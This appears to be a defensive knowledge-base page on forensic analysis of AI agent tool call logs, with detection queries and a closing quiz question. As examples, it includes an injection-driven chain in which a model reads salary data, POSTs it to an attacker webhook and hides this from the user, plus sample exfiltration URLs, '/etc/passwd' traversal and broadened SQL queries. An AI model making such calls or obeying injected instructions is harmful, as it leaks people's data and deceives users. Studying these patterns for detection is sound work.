Tool Call Forensics
Forensic investigation of agent tool calls: detecting unauthorized tool usage, analyzing parameter manipulation evidence, identifying exfiltration traces, and reconstructing agent action chains.
When an AI agent has access to tools -- search engines, databases, APIs, code executors, file systems, email senders -- the blast radius of an incident extends far beyond the model's text outputs. A compromised agent can read sensitive files, exfiltrate data through HTTP requests, execute arbitrary code, or take actions in external systems that are difficult or impossible to reverse. This page covers forensic investigation of tool call logs.
Tool Call Evidence Structure
A forensically useful tool call log entry captures the complete context of each invocation.
```json
{
  "call_id": "tc_001",
  "parent_request_id": "req_abc123",
  "timestamp": "2026-03-15T14:33:12Z",
  "tool_name": "database_query",
  "parameters": {
    "query": "SELECT * FROM customers WHERE region = 'EU'",
    "database": "production_crm"
  },
  "result": {
    "rows_returned": 1847,
    "columns": ["name", "email", "phone", "address"],
    "truncated": true
  },
  "authorization": {
    "user_id": "user_42",
    "permissions": ["read:customers"],
    "policy_decision": "allow"
  },
  "execution_time_ms": 234,
  "model_reasoning": "User asked for EU customer contact information for the quarterly report."
}
```
Detecting Unauthorized Tool Usage
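Before any deeper analysis, confirm that each log entry actually carries the fields forensics depends on; an entry missing its authorization record, for example, cannot support scope checks. A minimal Python sketch, assuming entries are parsed dicts with the field names from the example above:

```python
# Sketch: verify a tool call log entry carries the fields needed for
# forensic reconstruction. Field names follow the example entry above.
REQUIRED_FIELDS = {
    "call_id", "parent_request_id", "timestamp",
    "tool_name", "parameters", "result", "authorization",
}

def missing_forensic_fields(entry: dict) -> set[str]:
    """Return the set of required fields absent from a log entry."""
    return REQUIRED_FIELDS - entry.keys()

entry = {
    "call_id": "tc_001",
    "parent_request_id": "req_abc123",
    "timestamp": "2026-03-15T14:33:12Z",
    "tool_name": "database_query",
    "parameters": {"query": "SELECT 1"},
    "result": {"rows_returned": 1},
    # "authorization" intentionally omitted
}
print(missing_forensic_fields(entry))  # → {'authorization'}
```

Entries that fail this check should be flagged early, since gaps in the log are themselves evidence worth documenting.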
Legitimate vs. Adversarial Tool Patterns
| Indicator | Legitimate Use | Adversarial Use |
|---|---|---|
| Tool selection | Tools relevant to the user's stated task | Tools unrelated to the conversation topic |
| Parameter scope | Narrow, specific queries | Broad, wildcard, or exploratory queries |
| Data volume | Proportional to the user's request | Disproportionately large data retrieval |
| Access pattern | Consistent with user's role and permissions | Exceeds the user's normal data access scope |
| Timing | Single call or small chain per user request | Rapid sequential calls iterating through resources |
| Result usage | Results incorporated into a helpful response | Results summarized/encoded for extraction |
Unauthorized Tool Detection Queries
```sql
-- Detect tool calls that don't match user conversation topic
-- Requires topic tagging on conversations
SELECT
    tc.call_id,
    tc.tool_name,
    tc.parameters,
    tc.timestamp,
    c.topic_classification,
    tc.user_id
FROM tool_calls tc
JOIN conversations c ON tc.parent_request_id = c.request_id
WHERE tc.tool_name NOT IN (
    SELECT expected_tool
    FROM topic_tool_mapping
    WHERE topic = c.topic_classification
)
ORDER BY tc.timestamp DESC;

-- Detect unusual tool call volume per session
SELECT
    session_id,
    user_id,
    COUNT(*) AS tool_calls,
    COUNT(DISTINCT tool_name) AS distinct_tools,
    ARRAY_AGG(DISTINCT tool_name) AS tools_used
FROM tool_calls
WHERE timestamp > NOW() - INTERVAL '24 hours'
GROUP BY session_id, user_id
HAVING COUNT(*) > 20
ORDER BY tool_calls DESC;
```
Parameter Manipulation Evidence
Attackers manipulate tool call parameters to expand access beyond what the model would normally request. Look for these patterns:
Database Query Manipulation
| Normal Pattern | Adversarial Pattern | Evidence |
|---|---|---|
| `WHERE id = 42` | `WHERE 1=1` or `WHERE id > 0` | Broadened query scope to return all records |
| `SELECT name, email` | `SELECT *` | Requested all columns, including sensitive fields |
| `LIMIT 10` | No `LIMIT`, or `LIMIT 100000` | Removed pagination to extract bulk data |
| `WHERE department = 'sales'` | Removed department filter | Cross-departmental access |
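The query patterns in the table above can be screened for mechanically. The following is a minimal sketch, not a substitute for real SQL parsing; the pattern names and the digit threshold for "bulk" limits are illustrative assumptions:

```python
import re

# Heuristic flags for the adversarial query patterns tabulated above.
# A minimal sketch: robust detection should parse SQL, not pattern-match it.
PATTERNS = {
    "tautology": re.compile(r"\bWHERE\s+1\s*=\s*1\b", re.IGNORECASE),
    "select_star": re.compile(r"\bSELECT\s+\*", re.IGNORECASE),
    "bulk_limit": re.compile(r"\bLIMIT\s+\d{4,}\b", re.IGNORECASE),
}

def flag_query(query: str) -> list[str]:
    """Return the names of adversarial patterns found in a logged query."""
    flags = [name for name, pat in PATTERNS.items() if pat.search(query)]
    # A SELECT with no LIMIT at all is itself worth flagging.
    if re.search(r"\bSELECT\b", query, re.IGNORECASE) and not re.search(
        r"\bLIMIT\b", query, re.IGNORECASE
    ):
        flags.append("no_limit")
    return flags

print(flag_query("SELECT * FROM customers WHERE 1=1"))
# → ['tautology', 'select_star', 'no_limit']
```

Run over the `parameters.query` field of logged `database_query` calls, this gives a fast triage pass before manual review.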
File System Manipulation
| Normal Pattern | Adversarial Pattern | Evidence |
|---|---|---|
| `read_file("/app/docs/help.md")` | `read_file("/etc/passwd")` | Path traversal outside application scope |
| `list_directory("/app/uploads/user_42/")` | `list_directory("/")` | Directory enumeration from root |
| `read_file` only | `write_file` or `execute` | Privilege escalation through tool switching |
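Path traversal in logged file-tool parameters can be checked by resolving each requested path and testing containment. A sketch, assuming a hypothetical sandbox root of `/app` (substitute your application's actual root):

```python
import os

ALLOWED_ROOT = "/app"  # hypothetical application sandbox root

def is_path_in_scope(requested: str, root: str = ALLOWED_ROOT) -> bool:
    """True if the resolved path stays under the allowed root.

    os.path.realpath collapses ".." components and resolves symlinks,
    so "/app/../etc/passwd" is judged by its real target, not its text.
    """
    resolved = os.path.realpath(requested)
    return resolved == root or resolved.startswith(root + os.sep)

print(is_path_in_scope("/app/docs/help.md"))   # → True
print(is_path_in_scope("/app/../etc/passwd"))  # → False
```

Comparing the raw logged path against its resolved form is also useful evidence: a mismatch shows deliberate traversal rather than a typo.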
API Call Manipulation
| Normal Pattern | Adversarial Pattern | Evidence |
|---|---|---|
| `GET /api/user/me` | `GET /api/users` | Endpoint modification to access other users |
| Standard headers | Added `Authorization` headers | Credential injection in API calls |
| Application-internal URLs | External URLs (`https://attacker.com`) | Data exfiltration via outbound HTTP |
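The external-URL indicator is the easiest to automate: extract the host from each logged request URL and compare it against the set of application-internal hosts. A sketch, where the allowlist contents are illustrative assumptions:

```python
from urllib.parse import urlparse

# Hypothetical allowlist of application-internal hosts.
INTERNAL_HOSTS = {"api.internal.example", "localhost"}

def is_outbound(url: str) -> bool:
    """Flag tool-call URLs whose host is not on the internal allowlist."""
    host = (urlparse(url).hostname or "").lower()
    return host not in INTERNAL_HOSTS

print(is_outbound("https://api.internal.example/api/user/me"))  # → False
print(is_outbound("https://attacker.com/collect"))              # → True
```

Every call this flags is a candidate exfiltration channel and should feed directly into the provenance tracing described below.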
Exfiltration Traces
Data exfiltration through agent tool calls follows identifiable patterns.
Exfiltration Channels
| Channel | How It Works | Detection |
|---|---|---|
| Direct output | Model includes extracted data in its response to the user | Content analysis of model outputs |
| Outbound HTTP | Agent calls an external URL with extracted data in parameters | Monitor for external URL tool calls |
| Email/messaging | Agent sends data via email or messaging tool | Audit all send/share tool invocations |
| File write | Agent writes data to a user-accessible location | Monitor write tool calls and output paths |
| Code execution | Agent runs code that makes network requests | Analyze executed code for network operations |
| Encoded output | Agent encodes data (Base64, hex) and presents as normal output | Detect encoded content in outputs |
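For the encoded-output channel, long Base64 runs in model outputs can be detected and decoded for inspection. A sketch; the 40-character minimum run length is an illustrative threshold, tuned to skip short incidental matches:

```python
import base64
import re

# Runs of Base64 alphabet characters long enough to carry real data.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def find_base64_payloads(text: str) -> list[bytes]:
    """Return the decoded contents of long, valid Base64 runs in text."""
    payloads = []
    for run in B64_RUN.findall(text):
        try:
            payloads.append(base64.b64decode(run, validate=True))
        except ValueError:
            continue  # matched run was not actually valid Base64
    return payloads

secret = base64.b64encode(b"employee salary records, 200 rows").decode()
msg = f"Here is the summary you asked for: {secret}"
print(find_base64_payloads(msg))
# → [b'employee salary records, 200 rows']
```

The same scan applies to outbound request bodies, not just final responses, since encoding can happen at either stage.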
Exfiltration Chain Example
```
Step 1: User prompt with indirect injection triggers reconnaissance
    Tool:   search_internal_docs("employee salary data")
    Result: Found 3 documents in HR knowledge base

Step 2: Model retrieves sensitive documents
    Tool:   read_document(doc_id="hr_salary_2026")
    Result: Full salary data for 200 employees

Step 3: Model exfiltrates via outbound HTTP
    Tool:   web_request(
                url="https://webhook.site/attacker-id",
                method="POST",
                body="<encoded salary data>"
            )
    Result: HTTP 200 OK

Step 4: Model presents innocuous response to user
    Assistant: "I found some general information about compensation..."
```
Identify outbound data flows
Search tool call logs for any tools that send data to external destinations: HTTP requests, email sends, file uploads, webhook calls. These are the highest-priority exfiltration risks.
Trace data provenance
For each outbound flow, trace backward through the tool call chain to identify what data the model had access to. Follow the `parent_request_id` chain to reconstruct the full sequence.
Quantify data exposure
Determine the volume and sensitivity of data that passed through the exfiltration channel. Calculate the number of records, data types, and affected individuals.
Check for obfuscation
Examine the data sent through the exfiltration channel for encoding or transformation. Attackers may instruct the model to encode data before sending to avoid content filters.
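One simple obfuscation signal is byte entropy: encrypted or compressed payloads look close to random, while plain text does not. A sketch of the standard Shannon entropy measure, usable on logged request bodies:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; random bytes approach 8.0."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

# English-like text sits well below the maximum of 8 bits per byte.
print(round(shannon_entropy(b"quarterly report summary for the team"), 2))
print(round(shannon_entropy(bytes(range(256))), 2))  # → 8.0
```

A reasonable (but assumption-laden) triage rule is to flag text-typed fields whose entropy exceeds roughly 6 bits per byte for manual review; Base64 output lands in between and is better caught by the decoder sketch earlier in this page's exfiltration section.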
Agent Action Chain Reconstruction
Reconstructing the complete sequence of agent actions reveals the full attack narrative.
Chain Visualization
Build a directed graph of tool calls within a session:
```
[User Message] → [Model Reasoning] → [Tool Call 1: search]
                                            ↓
                                     [Tool Result 1]
                                            ↓
                 [Model Reasoning] → [Tool Call 2: read_file]
                                            ↓
                                     [Tool Result 2]
                                            ↓
                 [Model Reasoning] → [Tool Call 3: web_request]
                                            ↓
                                     [Tool Result 3]
                                            ↓
                         [Model Response to User]
```
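The linear backbone of this graph can be recovered directly from the log: group records by `parent_request_id` and order within each group by timestamp. A minimal sketch, assuming records carry the fields from the log entry format shown earlier:

```python
from itertools import groupby

def reconstruct_chains(records: list[dict]) -> dict[str, list[str]]:
    """Map each parent_request_id to its time-ordered list of tool calls."""
    ordered = sorted(
        records, key=lambda r: (r["parent_request_id"], r["timestamp"])
    )
    return {
        req_id: [r["tool_name"] for r in group]
        for req_id, group in groupby(
            ordered, key=lambda r: r["parent_request_id"]
        )
    }

log = [
    {"parent_request_id": "req_1", "timestamp": "14:33:20", "tool_name": "web_request"},
    {"parent_request_id": "req_1", "timestamp": "14:33:05", "tool_name": "search"},
    {"parent_request_id": "req_1", "timestamp": "14:33:12", "tool_name": "read_file"},
]
print(reconstruct_chains(log))
# → {'req_1': ['search', 'read_file', 'web_request']}
```

Edges between tool results and subsequent calls (did result 1 feed call 2?) still require comparing result content against later parameters, which is harder to automate; the ordered chain is the starting skeleton.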
Key Questions for Chain Analysis
| Question | What It Reveals |
|---|---|
| What triggered the first tool call? | Whether the attack originated from user input or injected context |
| Did the model's reasoning justify each tool call? | Whether the model was manipulated or acting within normal parameters |
| Were tool results fed back into subsequent tool calls? | How information propagated through the agent's action chain |
| Did any tool call exceed the user's authorization scope? | Whether permission boundaries were violated |
| What data was available to the model when it generated its final response? | The maximum possible data exposure |
Tool Call Forensic Checklist
Use this checklist when investigating agent tool calls during an incident:
| # | Check | Status |
|---|---|---|
| 1 | List all tool calls in the incident time window | |
| 2 | Flag tool calls not matching the conversation topic | |
| 3 | Check for parameter manipulation (wildcard queries, path traversal, scope expansion) | |
| 4 | Identify all outbound data flows (HTTP, email, file write) | |
| 5 | Trace data provenance for each outbound flow | |
| 6 | Compare model reasoning with actual tool parameters | |
| 7 | Check authorization decisions for each tool call | |
| 8 | Identify the injection source that triggered adversarial tool usage | |
| 9 | Quantify data exposure volume and sensitivity | |
| 10 | Document the complete tool call chain with timestamps | |
Related Topics
- Agent & Agentic Exploitation -- understanding agent attack techniques
- Prompt Log Forensics -- analyzing the prompts that triggered tool calls
- Data Exfiltration IR Playbook -- responding to confirmed exfiltration
- Evidence Preservation -- preserving tool call evidence
References
- "Not What You've Signed Up For: Compromising Real-World LLM-Integrated Applications with Indirect Prompt Injection" - Greshake et al. (2023) - Foundational research on agent exploitation via indirect injection
- "OWASP Top 10 for LLM Applications: LLM07 - Insecure Plugin Design" - OWASP Foundation (2023) - Tool/plugin security risks in AI agents
- "MITRE ATLAS Technique AML.T0053: LLM Plugin Compromise" - MITRE Corporation (2025) - Standardized technique for agent tool abuse
An agent's tool call log shows it searched for 'salary data', read an HR document, then made an HTTP POST to an external webhook. The model's reasoning for the HTTP call says 'sending the report summary to the user's webhook.' What should you investigate first?